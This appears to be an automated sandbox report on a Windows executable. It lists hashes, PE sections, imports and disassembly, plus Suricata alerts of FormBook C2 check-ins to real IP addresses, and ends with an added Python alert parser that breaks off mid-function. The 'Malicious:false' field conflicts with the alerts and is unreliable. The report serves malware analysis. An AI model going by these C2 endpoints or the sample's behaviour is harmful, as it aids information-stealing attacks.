                                                          SHA-512:A4F93865778D534F0FC3B40373A0C16F5C9A72B71BEA17F2E856CEF576B15C6ADD138765BF98E4E2B3F231D6231E01AF43AC203908B3E4E7D0E4263CDFF3F407
                                                          Malicious:false
                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Entropy (8bit):7.221614582911501
                                                          TrID:
                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                          • DOS Executable Generic (2002/1) 0.02%
                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                          File name:SpCuEoekPa.exe
                                                          File size:1'192'448 bytes
                                                          MD5:9a01cd212369451960342e9ccf98c51d
                                                          SHA1:4ef0a6f2fe5a55bffa839ede7a2e8093fe741533
                                                          SHA256:e0ec2a4761f2959631f99efb266eb3aa1c78ea3ed7741c28387143dc9e28fc21
                                                          SHA512:fb9e0c8d72b5ec37d6b1896c2820102a3a55b9906791e3db9f161c0f1e056421633e40e1f5c7d4de81e83206fbd60a8d786ea0630f6bcfe957ec216266adb5ef
                                                          SSDEEP:24576:Iu6J33O0c+JY5UZ+XC0kGso6FawIzjdMbsU/0E1WY:iu0c++OCvkGs9FawIlLY
                                                          TLSH:0345CF22B3DDC361CB769173BF6AB3056EBF78610630B8572F980D79A950171262C7A3
                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.
                                                          Icon Hash:8ea4b193b1ec9a84
                                                          Entrypoint:0x427dcd
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x674FD88C [Wed Dec 4 04:20:28 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:
                                                          OS Version Major:5
                                                          OS Version Minor:1
                                                          File Version Major:5
                                                          File Version Minor:1
                                                          Subsystem Version Major:5
                                                          Subsystem Version Minor:1
                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7
                                                          Instruction
                                                          call 00007FA36524FD1Ah
                                                          jmp 00007FA365242AE4h
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          int3
                                                          push edi
                                                          push esi
                                                          mov esi, dword ptr [esp+10h]
                                                          mov ecx, dword ptr [esp+14h]
                                                          mov edi, dword ptr [esp+0Ch]
                                                          mov eax, ecx
                                                          mov edx, ecx
                                                          add eax, esi
                                                          cmp edi, esi
                                                          jbe 00007FA365242C6Ah
                                                          cmp edi, eax
                                                          jc 00007FA365242FCEh
                                                          bt dword ptr [004C31FCh], 01h
                                                          jnc 00007FA365242C69h
                                                          rep movsb
                                                          jmp 00007FA365242F7Ch
                                                          cmp ecx, 00000080h
                                                          jc 00007FA365242E34h
                                                          mov eax, edi
                                                          xor eax, esi
                                                          test eax, 0000000Fh
                                                          jne 00007FA365242C70h
                                                          bt dword ptr [004BE324h], 01h
                                                          jc 00007FA365243140h
                                                          bt dword ptr [004C31FCh], 00000000h
                                                          jnc 00007FA365242E0Dh
                                                          test edi, 00000003h
                                                          jne 00007FA365242E1Eh
                                                          test esi, 00000003h
                                                          jne 00007FA365242DFDh
                                                          bt edi, 02h
                                                          jnc 00007FA365242C6Fh
                                                          mov eax, dword ptr [esi]
                                                          sub ecx, 04h
                                                          lea esi, dword ptr [esi+04h]
                                                          mov dword ptr [edi], eax
                                                          lea edi, dword ptr [edi+04h]
                                                          bt edi, 03h
                                                          jnc 00007FA365242C73h
                                                          movq xmm1, qword ptr [esi]
                                                          sub ecx, 08h
                                                          lea esi, dword ptr [esi+08h]
                                                          movq qword ptr [edi], xmm1
                                                          lea edi, dword ptr [edi+08h]
                                                          test esi, 00000007h
                                                          je 00007FA365242CC5h
                                                          bt esi, 03h
                                                          jnc 00007FA365242D18h
                                                          Programming Language:
                                                          • [ASM] VS2013 build 21005
                                                          • [ C ] VS2013 build 21005
                                                          • [C++] VS2013 build 21005
                                                          • [ C ] VS2008 SP1 build 30729
                                                          • [IMP] VS2008 SP1 build 30729
                                                          • [ASM] VS2013 UPD4 build 31101
                                                          • [RES] VS2013 build 21005
                                                          • [LNK] VS2013 UPD4 build 31101
                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x5a940 | .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x122000 | 0x711c | .reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                          .text | 0x1000 | 0x8dcc4 | 0x8de00 | d28a820a1d9ff26cda02d12b888ba4b4 | False | 0.5728679102422908 | data | 6.676118058520316 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rdata | 0x8f000 | 0x2e10e | 0x2e200 | 79b14b254506b0dbc8cd0ad67fb70ad9 | False | 0.33535526761517614 | OpenPGP Public Key | 5.76010872795207 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .data | 0xbe000 | 0x8f74 | 0x5200 | 9f9d6f746f1a415a63de45f8b7983d33 | False | 0.1017530487804878 | data | 1.198745897703538 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .rsrc | 0xc7000 | 0x5a940 | 0x5aa00 | 3e2e88f2a50c8ced1c5f4dacce624ef5 | False | 0.9766487068965517 | data | 7.971709989877312 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                          .reloc | 0x122000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                          RT_ICON | 0xc7458 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                                                          RT_ICON | 0xc7580 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                                                          RT_ICON | 0xc76a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                                                          RT_ICON | 0xc77d0 | 0x10d7 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9213639526791928
                                                          RT_MENU | 0xc88a8 | 0x50 | data | English | Great Britain | 0.9
                                                          RT_STRING | 0xc88f8 | 0x594 | data | English | Great Britain | 0.3333333333333333
                                                          RT_STRING | 0xc8e8c | 0x68a | data | English | Great Britain | 0.2747909199522103
                                                          RT_STRING | 0xc9518 | 0x490 | data | English | Great Britain | 0.3715753424657534
                                                          RT_STRING | 0xc99a8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                                                          RT_STRING | 0xc9fa4 | 0x65c | data | English | Great Britain | 0.34336609336609336
                                                          RT_STRING | 0xca600 | 0x466 | data | English | Great Britain | 0.3605683836589698
                                                          RT_STRING | 0xcaa68 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                                                          RT_RCDATA | 0xcabc0 | 0x56863 | data | | | 1.0003273109990605
                                                          RT_GROUP_ICON | 0x121424 | 0x14 | data | English | Great Britain | 1.2
                                                          RT_GROUP_ICON | 0x121438 | 0x14 | data | English | Great Britain | 1.25
                                                          RT_GROUP_ICON | 0x12144c | 0x14 | data | English | Great Britain | 1.15
                                                          RT_GROUP_ICON | 0x121460 | 0x14 | data | English | Great Britain | 1.25
                                                          RT_VERSION | 0x121474 | 0xdc | data | English | Great Britain | 0.6181818181818182
                                                          RT_MANIFEST | 0x121550 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                                          DLL | Import
                                                          WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                          VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                          WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                                                          COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                          MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                          WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                          PSAPI.DLL | GetProcessMemoryInfo
                                                          IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                          USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                          UxTheme.dll | IsThemeActive
                                                          KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                          USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                          GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                          COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                                                          ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                          SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                          ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                          OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                                                          Language of compilation system | Country where language is spoken | Map
                                                          English | Great Britain |
                                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                          2025-01-11T03:32:05.335065+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49974 | 38.47.233.21 | 80 | TCP
                                                          2025-01-11T03:32:05.335065+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49974 | 38.47.233.21 | 80 | TCP
                                                          2025-01-11T03:32:21.843289+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49975 | 172.67.137.47 | 80 | TCP
                                                          2025-01-11T03:32:24.372116+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49976 | 172.67.137.47 | 80 | TCP
                                                          2025-01-11T03:32:26.972005+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49977 | 172.67.137.47 | 80 | TCP
                                                          2025-01-11T03:32:29.533346+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49979 | 172.67.137.47 | 80 | TCP
                                                          2025-01-11T03:32:29.533346+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49979 | 172.67.137.47 | 80 | TCP
                                                          2025-01-11T03:32:36.425140+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49980 | 206.238.89.119 | 80 | TCP
                                                          2025-01-11T03:32:38.971900+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49981 | 206.238.89.119 | 80 | TCP
                                                          2025-01-11T03:32:41.534350+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49982 | 206.238.89.119 | 80 | TCP
                                                          2025-01-11T03:33:04.000410+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49983 | 206.238.89.119 | 80 | TCP
                                                          2025-01-11T03:33:04.000410+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49983 | 206.238.89.119 | 80 | TCP
                                                          2025-01-11T03:33:10.550115+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49984 | 66.29.149.46 | 80 | TCP
                                                          2025-01-11T03:33:12.188505+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49985 | 66.29.149.46 | 80 | TCP
                                                          2025-01-11T03:33:14.741830+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49986 | 66.29.149.46 | 80 | TCP
                                                          2025-01-11T03:33:17.274674+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49987 | 66.29.149.46 | 80 | TCP
                                                          2025-01-11T03:33:17.274674+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49987 | 66.29.149.46 | 80 | TCP
                                                          2025-01-11T03:33:22.966175+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49988 | 217.70.184.50 | 80 | TCP
                                                          2025-01-11T03:33:25.551422+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49989 | 217.70.184.50 | 80 | TCP
                                                          2025-01-11T03:33:28.071583+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49990 | 217.70.184.50 | 80 | TCP
                                                          2025-01-11T03:33:30.621345+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49991 | 217.70.184.50 | 80 | TCP
                                                          2025-01-11T03:33:30.621345+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.10 | 49991 | 217.70.184.50 | 80 | TCP
                                                          2025-01-11T03:33:37.057594+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49992 | 13.228.81.39 | 80 | TCP
                                                          2025-01-11T03:33:39.608449+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49993 | 13.228.81.39 | 80 | TCP
                                                          2025-01-11T03:33:42.183675+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.10 | 49994 | 13.228.81.39 | 80 | TCP
                                                          2025-01-11T03:33:44.702276+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.10 | 49995 | 13.228.81.39 | 80 | TCP
                                                          2025-01-11T03:33:44.702276+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104999513.228.81.3980TCP
                                                          2025-01-11T03:33:50.196022+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999613.248.169.4880TCP
                                                          2025-01-11T03:33:52.749759+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999713.248.169.4880TCP
                                                          2025-01-11T03:33:55.293008+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.104999813.248.169.4880TCP
                                                          2025-01-11T03:34:00.885211+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.104999913.248.169.4880TCP
                                                          2025-01-11T03:34:00.885211+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.104999913.248.169.4880TCP
                                                          2025-01-11T03:34:07.456560+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050000104.21.64.180TCP
                                                          2025-01-11T03:34:10.004418+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050001104.21.64.180TCP
                                                          2025-01-11T03:34:12.550350+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1050002104.21.64.180TCP
                                                          2025-01-11T03:34:15.255213+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1050003104.21.64.180TCP
                                                          2025-01-11T03:34:15.255213+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1050003104.21.64.180TCP
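The Suricata rows above come out of text extraction with their column separators lost, so severity, source IP, source port, destination IP and destination port run together into one digit string. The following is an added example, not part of the Joe Sandbox report, that recovers the fields from such rows and then lists, per C2 endpoint, the order of check-in methods. The split is genuinely ambiguous where a port number abuts an address octet (for instance "...11980" can be .1:1980, .11:980 or .119:80), so the parser enumerates every valid split and keeps only the candidates consistent with two facts taken from the report itself: the analysis VM is 192.168.2.10 and every check-in goes to TCP/80. Function names and the fixed set of sample rows (copied from the table above) are mine. Run over the report's rows it shows the same sequence for each host, three POST check-ins followed by one GET, after which the sample moves to the next host.

```python
"""Recover structured Suricata alerts from a text-extracted Joe Sandbox table.

Added example, not part of the Joe Sandbox report. The extraction dropped the
column separators, so the network tuple became one digit-and-dot string whose
split is ambiguous. Every split into valid octets and ports is enumerated and
only the candidates consistent with known facts about the run (analysis VM
address, expected server port) are kept.
"""
import re
from collections import defaultdict

# Rows copied from the report's Suricata alert table, exactly as extracted.
RAW_ALERTS = [
    "2025-01-11T03:32:21.843289+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049975172.67.137.4780TCP",
    "2025-01-11T03:32:24.372116+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049976172.67.137.4780TCP",
    "2025-01-11T03:32:26.972005+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049977172.67.137.4780TCP",
    "2025-01-11T03:32:29.533346+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049979172.67.137.4780TCP",
    "2025-01-11T03:32:29.533346+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049979172.67.137.4780TCP",
    "2025-01-11T03:32:36.425140+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049980206.238.89.11980TCP",
    "2025-01-11T03:32:38.971900+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049981206.238.89.11980TCP",
    "2025-01-11T03:32:41.534350+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.1049982206.238.89.11980TCP",
    "2025-01-11T03:33:04.000410+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.1049983206.238.89.11980TCP",
    "2025-01-11T03:33:04.000410+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.1049983206.238.89.11980TCP",
]

SANDBOX_HOST = "192.168.2.10"   # analysis VM, as listed in the report's TCP packet table
EXPECTED_SERVER_PORTS = {80}    # every check-in in this report goes to TCP/80

OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
ROW_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d\.\d+[+-]\d{4})"
    r"(?P<sid>\d+?)"                  # rule SID runs straight into the signature text
    r"(?P<sig>ET.+?)"                 # lazy: stops at the first digit that begins a valid quad
    r"(?P<sev>\d)"
    rf"(?P<net>{OCTET}\.{OCTET}\.{OCTET}\.\d+(?:\.\d+){{3}})"  # two quads + two ports, 6 dots
    r"(?P<proto>TCP|UDP)$"
)


def _octet_ok(s):
    return s.isdigit() and int(s) <= 255 and (s == "0" or s[0] != "0")


def _port_ok(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def split_endpoints(net):
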